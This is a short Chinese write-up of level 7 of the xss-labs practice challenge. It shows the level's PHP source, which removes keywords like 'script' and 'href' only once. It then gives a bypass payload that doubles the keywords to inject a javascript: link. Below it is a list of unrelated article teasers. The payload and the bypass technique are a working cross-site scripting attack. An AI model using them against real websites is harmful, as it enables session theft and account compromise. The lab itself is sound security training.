xsslabs第七关

xsslabs第七关

news2024/9/22 15:32:05

源码

<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错！");
 window.location.href="level8.php?keyword=nice try!"; 
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>

它把一些关键词换成了空所以双写

"> <a hrehreff=javascrscriptipt:alert('xss')>xss</a>

这样第七关就成功了

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1480968.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

$DSP软件架构$

DSP软件架构

🎬个人简介：一个全栈工程师的升级之路！ 📋个人专栏：计算机杂记 🎀CSDN主页发狂的小花 🌄人生秘诀：学习的本质就是极致重复! 目录一数字信号处理基本运算二 DSP软件架构 1 哈…

阅读更多...

nginx如何配置命令启动

nginx如何配置命令启动

我安装好nginx后，发现不能使用systemctl start nginx或者systemctl stop nginx来控制启停解决方法如下首先要建一个nginx.pid的文件一般是建在 /var/run/这个路径下面 sudo touch /var/run/nginx.pid 添加权限 sudo chmod 644 /var/run/nginx.pid可以进入到…

阅读更多...

136.乐理基础-旋律音程、和声音程、自然音程、变化音程

136.乐理基础-旋律音程、和声音程、自然音程、变化音程

内存参考于：三分钟音乐社上一个内容：135.乐理基础-半音是小二度吗？全音是大二度吗？三全音-CSDN博客上一个内容里练习的答案： 旋律音程旋律音程指的是音程中两个音，一前一后，有先后顺序依次…

阅读更多...

Linux调试器-gdb使用与冯诺依曼体系结构

Linux调试器-gdb使用与冯诺依曼体系结构

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档文章目录前言 Linux调试器-gdb使用 1. 背景 2. 开始使用冯诺依曼体系结构总结前言世上有两种耀眼的光芒，一种是正在升起的太阳，一种是正在努力学…

阅读更多...

java009 - Java调试debugger

java009 - Java调试debugger

1、debugger概述程序的调试工具，用于查看追踪程序的执行流程，也可以调试程序。 2、debugger调试流程 2.1 如何加断点 2.2 如何运行加了断点的程序在代码区域右键---->debugger执行 2.3 看哪里看console窗口 2.4 点哪里点step into(F7)这个箭…

阅读更多...

SQL Server 阻止了对组件 ‘Ole Automation Procedures‘ 的过程‘sys.sp_OACreate‘ 的访问

SQL Server 阻止了对组件 ‘Ole Automation Procedures‘ 的过程‘sys.sp_OACreate‘ 的访问

SQL Server 阻止了对组件 Ole Automation Procedures 的过程sys.sp_OACreate 的访问，因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 Ole Automation Procedures。有关启用 Ole Automation Procedures 的详细信息&a…

阅读更多...

数据结构从入门到精通——算法的时间复杂度和空间复杂度

数据结构从入门到精通——算法的时间复杂度和空间复杂度

算法的时间复杂度和空间复杂度前言一、算法效率1.1 如何衡量一个算法的好坏1.2 算法的复杂度二、时间复杂度2.1 时间复杂度的概念2.2 大O的渐进表示法2.3常见时间复杂度计算举例2.4等差数列计算公式2.5等比数列计算方法三、空间复杂度四、常见复杂度对比五、复杂度的oj练习…

阅读更多...

灯塔：HTML笔记

灯塔：HTML笔记

网页由哪些部分组成？ *文字图片音频视频超链接程序员写的代码是通过浏览器转换成网页的五大浏览器有哪些？ *IE浏览器 *火狐浏览器（Firefox） *谷歌浏览器（Chrome） *Safari浏览器 *欧朋浏览器&…

阅读更多...

【C++】数组、函数、指针

【C++】数组、函数、指针

文章目录 1.数组1.1一维数组1.2二维数组 2.函数3.指针：可以通过指针间接访问内存(指针记录地址）3.1 指针的定义和使用3.2 指针所占用空间3.3 空指针和野指针3.4 const修饰指针3.5指针和数组3.6指针和函数3.7练习（指针、数组、函数&#xff09…

阅读更多...

【Java设计模式】三、

【Java设计模式】三、

文章目录 0、案例：咖啡屋1、简单工厂模式静态工厂（不属于23种之列）2、工厂方法模式3、抽象工厂模式4、建造者模式5、原型设计模式 0、案例：咖啡屋模拟咖啡店点餐。咖啡有多种，抽象类，子类为各种咖啡。咖…

阅读更多...

第四个程序：（a+b）^2+a/c-c^2

第四个程序：（a+b）^2+a/c-c^2

（ab）^2a/c-c^2运算出结果步骤： 第一步： 建立项目; 第二步：添加部件，连线，完成程序第三步：运行得出结果视频： (ab)^2ac-c^2

阅读更多...

软考-计算题

软考-计算题

1.二维矩阵转换成一维矩阵 2.算术表达式： 3.计算完成项目的最少时间：之前和的max（必须之前的所有环节都完成） 松弛时间：最晚开始时间-最早开始时间最早：之前环节都完成的和的max 最晚：总时间…

阅读更多...

2024年经典【自动化面试题】附答案

2024年经典【自动化面试题】附答案

一、请描述一下自动化测试流程？ 自动化测试流程一般可以分为以下七步： 编写自动化测试计划； 设计自动化测试用例； 编写自动化测试框架和脚本； 调试并维护脚本； 无人值守测试； 后期脚本维…

阅读更多...

java009 - Java面向对象基础

java009 - Java面向对象基础

1、类和对象 1.1 什么是对象万物皆对象，客观存在的事物皆为对象。 1.2 什么是面向对象 1.3 什么是类类是对现实生活中一类具有共同属性和行为的事物抽象。特点： 类是对象的数据类型类是具有相同属性和行为的一组对象的集合 1.4 什么是对象的属…

阅读更多...

装饰器模式详解设计模式

装饰器模式详解设计模式

装饰器模式它允许你在不改变对象结构的情况下，动态地将新功能附加到对象上。结构： 抽象组件（Component）：定义了原始对象和装饰器对象的公共接口或抽象类，可以是具体组件类的父类或接口。具体组件&…

阅读更多...

【c++】stack和queue模拟实现

【c++】stack和queue模拟实现

> 作者简介：დ旧言~，目前大二，现在学习Java，c，c，Python等 > 座右铭：松树千年终是朽，槿花一日自为荣。 > 目标：能手撕stack和queue模拟 > 毒鸡汤：…

阅读更多...

Spring Cloud 构建面向企业的大型分布式微服务快速开发框架+技术栈介绍

Spring Cloud 构建面向企业的大型分布式微服务快速开发框架+技术栈介绍

分布式架构图 Cloud架构清单 Commonservice（通用服务） 1）清单列表 2）代码结构 Component（通用组件） 1）清单列表 2）代码结构快速开发管理平台——云架构【系统管理平台】一…

阅读更多...

深度学习-回顾经典AlexNet网络：山高我为峰

深度学习-回顾经典AlexNet网络：山高我为峰

深度学习-回顾经典AlexNet网络之山高我为峰深度学习中，经典网络引领一波又一波的技术革命，从LetNet到当前最火的GPT所用的Transformer，它们把AI技术不断推向高潮。2012年AlexNet大放异彩，它把深度学习技术引领第一个高峰&#x…

阅读更多...

MySQL：合并查询语句

MySQL：合并查询语句

1、查询表的数据 t_book表数据 SELECT * FROM db_book.t_book; t_booktype表数据 SELECT * FROM db_book.t_booktype; 提醒： 下面的查询操作的数据来自上图查询表的数据 2. 使用 UNION 查询结果合并，会去掉重复的数据使用UNION关键字是，数…

阅读更多...

linux_day04

linux_day04

大纲：命令，vim，gcc，编译工具，生成代码，调试，库makefile，系统编程文件系统：文件属性，文件内容，万物皆文件（不在内存中的是文件&#…

阅读更多...

推荐文章

最新文章